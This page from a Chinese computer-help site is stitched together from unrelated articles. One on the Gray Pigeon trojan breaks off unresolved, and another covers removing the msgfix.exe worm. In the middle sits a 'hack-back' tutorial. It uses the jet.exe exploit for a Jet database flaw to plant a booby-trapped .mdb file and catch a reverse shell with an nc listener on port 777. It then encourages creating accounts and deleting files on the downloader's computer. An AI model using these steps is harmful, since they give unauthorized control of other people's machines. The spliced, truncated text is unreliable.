我的杀毒软件是通过在线实时升级的,目前是最新版本,看来杀毒软件对付不了它。通过查看病毒防火墙日志,显示为“Iexplore.exe>>c:\program files\Internet Exploer\Iexplore.exe->backdoor.Gpigeon.snl”。这不就是大名鼎鼎的灰鸽子木马病毒吗?灰鸽子以其操作的便捷和功能的强大,不易被查除且变种诸多等原因,而在网络上广为流传。于是请来了灰鸽子后门专杀工具,竟然杀不掉,又请来木马清道夫,也不行。然后使用QQ木马专杀和反间谍专家均不能解决问题。如何清除灰鸽子呢?
搜索特定文件无头绪
灰鸽子无论自定义的服务器端文件名是什么,一般都会在操作系统的安装目录下生成一个以“_hook.dll”结尾的文件。由于正常模式下灰鸽子会隐藏自身,因此检测灰鸽子的操作一定要在安全模式下进行。又由于灰鸽子的文件本身具有隐藏属性,因此要设置Windows显示所有文件,然后打开Windows的“搜索”,文件名称输入“_hook.dll”,搜索位置选择Windows的安装目录。wWw.ITComputER.CoM.cn
经过搜索,却没有发现以“_hook.dll”结尾的文件。于是把搜索范围扩大到整个C盘,只搜索到一个mag_hook.dll的文件,路径为c:\windows\system32,而这个文件是系统所必需的。况且如果mag_hook.dll是病毒文件的话,还应该有相应的mag.exe、mag.dll文件和用于记录键盘操作的magKey.dll文件,但这些都没有。
既然找不到病毒文件,也就没法在注册表中找到相应的服务项。在注册表HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Run项中,也没有多余的启动项。这下我傻眼了,难道遇到高人了?
发现疑点顺藤摸瓜
如何对付入侵者
数据库是一个网站的核心,也是入侵者入侵网站时最想得到的东西。他们会通过“暴库”或者注入攻击找到数据库的路径,从而非法下载到数据库,并从中获得包括管理员账户和密码在内的重要信息。对于一名站长而言,数据库被非法下载是一件极为苦恼的事。有没有想过给那些非法下载数据库的入侵者一个教训呢?在本文中你将找到答案。www.sq120.com 推荐文章
反击原理
微软在2004年时曾公布过一个Windows漏洞,这个漏洞的全称为“Microsoft Jet数据库引擎中的漏洞可能允许代码执行”,受影响的系统几乎包含微软的全系列操作系统版本。入侵者可以通过这个漏洞构造恶意的数据库文件,当没有修补过漏洞的用户打开这个恶意的数据库文件时,将会执行黑客事先设置的任意代码。
反过来思考,如果我们将这个漏洞利用起来,把构造好的恶意数据库文件设置为网站的数据库,故意暴露给黑客,这样当他们下载了数据库并打开时,反而成了我们的肉鸡。
借漏洞工具设下陷阱
利用这个漏洞我们要借助该漏洞的溢出程序jet.exe。运行下载jet.exe,解压到某个位置,例如“c:\”,然后点“开始→运行”,输入“cmd”运行“命令提示符”。在“命令提示符”中运行jet.exe。
工具的利用方法有4种:0表示在本地测试漏洞;1表示利用反向连接利用漏洞;2的功能类似“下载者”,被溢出的主机主动从指定的网址处下载可执行文件并运行,对穿透防火墙很有用;3表示从本地下载可执行文件并运行。这里我们用第2种功能来进行测试。
监听本地端口
使用第2种方法,我们要监听一个本地端口。当黑客的主机溢出后会将一个Shell发送到我们监听的端口上。
在“命令提示符”中运行黑客的“瑞士军刀”nc,输入如下命令“nc -vv -l -p 777”,回车后会显示“listening on [any] 777 ...”。这样就成功开始监听本机的777端口了。
构造恶意数据库文件
运行“命令提示符”,输入命令“ipconfig”,查看本机IP,假设这里为60.176.*.*。在“命令提示符”中运行jet.exe,输入命令“jet 2 60.176. *.* 777”,如果显示“Malformed db1.mdb file created. Now open with MSAccess.”,则表示命令执行成功。在同目录下会生成db1.mdb文件,这就是我们所需要的“恶意”数据库文件了。
提示:很多使用ADSL上网的用户输入命令“ipconfig”后会出现两个IP地址,其中一个IP地址显示“192.168.0.1”。这个IP地址其实是内网的IP地址,属于一个保留的IP地址,外网访问不了这个地址,因此我们在测试时需要使用类似上文中的IP地址。
故意暴露数据库路径
目前黑客对下载网站数据库的途径很多,但最常用的伎俩就是使用网站程序的默认数据库路径,将路径加在网站域名后进行猜测。
例如:生成一个mdb文件,然后放到该目录下。入侵者一般都会先使用默认路径来下载数据库,而一旦下载到数据库,就会被胜利冲昏头脑,很少会去判断数据库的真伪。而在他嘲讽该网站站长安全意识低下的同时,自己的电脑已经成为了别人的肉鸡。
等入侵者自投罗网
接下来的工作就是等待倒霉的入侵者来下载我们的数据库并运行了。当“恶意”数据库被打开时,对于入侵者来说,就等于打开了一个潘多拉盒子。返回查看nc监听的窗口,可以发现监听中的窗口已经有了反映,按一下“Enter”键,即可得到一个来自入侵者主机的Shell。
由于对这个漏洞溢出后,我们默认得到的是最高权限,因此我们可以在入侵者的主机上建立账户,修改、删除任意文件。给入侵者一个沉痛的教训,让他偷鸡不成蚀把米。当然不能玩得过火,否则我们就是入侵者了。
如何查杀未知病毒
这几天我上因特网速度突然很慢,同时在操作电脑的时候也发现系统速度很慢,但是我装的杀毒软件对于此病毒没有任何报警。检查计算机发现在系统进程表中有三四个msgfix.exe文件,而有时候甚至多达六七个msgfix.exe文件(见图),CPU占用率经常高达80%以上。www.sq120.com推荐文章
用网络监测软件监测到该病毒计算机在攻击其他计算机“135、139、445、44444”等几个端口。我怀疑是病毒所导致,启用杀毒软件查杀该病毒,结果显示“无病毒感染”,采用到安全模式下使用手工清除该病毒感染的文件msgfix.exe能清除,但是重启计算机后不到3分钟,系统又出现感染病毒状况。
网上求助得启发
我上网去求助,发现在各大论坛上是“哭喊声一片”,到处都是求助如何查杀病毒感染文件Msgfix.exe帖子。有的说是波特变种F病毒感染引起的,有的说是Worm_Timer.d或Worm_sdbot.c病毒感染引起的等等。
有一个帖子对我的启发很大:“病毒感染msgfix.exe文件,通过弱密码进行传播,修改注册表实现自启动,枚举本地IP地址,试图利用IPC弱口令将自己复制到别的主机上。”
我仔细分析了一下,全校共有350多台计算机。根据我的调查,被感染的计算机只有30多台,进一步分析发现Windows XP和Windows 98操作系统都没有被感染病毒,而Windows 2000操作系统中加用户密码的计算机也都没有被感染病毒,只有那些没有加用户密码的Windows2000操作系统的计算机被感染病毒。
为什么Windows XP、Windows 98操作系统没有加用户密码都没有被感染病毒呢?我发现Windows XP操作系统默认是禁止IPC$空连接的,即:HKEY_LOCAL_MACHINE\Systen\CurrentControlSet \Control\Lsa下的“restrctanony mous”的键值是1,而Windows 98操作系统中根本就没有IPC$空连接的项目。
虽然在Windows 2000操作系统注册表中 “restrctanony mous”的键值是0,即开启IPC$空连接,但是如果用户设有密码,病毒则无法通过IPC$空连接进行传播。
找准关键,有的放矢
现在,我已经知道病毒的传播原理,即利用IPC弱口令将自己复制到主机上,修改注册表实现自启动,枚举本地IP地址。
下面就动手杀毒,首先断开网线,重启计算机,按F8键进入安全模式,在安全模式下,修改注册表HKEY_LOCAL_MACHINE\Systen\CurrentControlSet\Control\Lsa下restrctanony mous的键值,把0改为1。同时清除注册表中三个msgfix.exe文件,即:HKEY_LOCAL_MACHINE\Software \Microsoft \Windows\CurrentVersion\Run;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Runservices和HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run下的msgfix.exe文件,然后清除在操作系统盘下的一个msgfix.exe文件,即:C:\WINNT\system32\msgfix.exe 。
然后用“开始→搜索→文件或文件夹搜索”看是否还有其他的msgfix.exe文件,如有则一律清除,最后退出安全模式重启计算机。再次进入系统后,病毒没有再次出现,系统中也没有再发现msgfix.exe进程,杀毒成功。
金小林战友为我提供了一个比较特殊的自己动手查杀未知病毒的方法。这个方法对于很多对于注册表或者进程查看不熟悉的朋友来说,还是比较困难的。但是很多朋友可以学习金小林战友解决问题的思路。
遇到未知病毒的袭击,在杀毒软件无法查杀的情况下,不慌乱。首先去收集病毒发生的症状和一些出现的特殊程序代码,然后通过网络去求助高手。也许在很多时候,我们能够通过高手的提示得到启发,让我们找到查杀病毒的关键。
From:http://www.itcomputer.com.cn/Article/Network/201309/970.html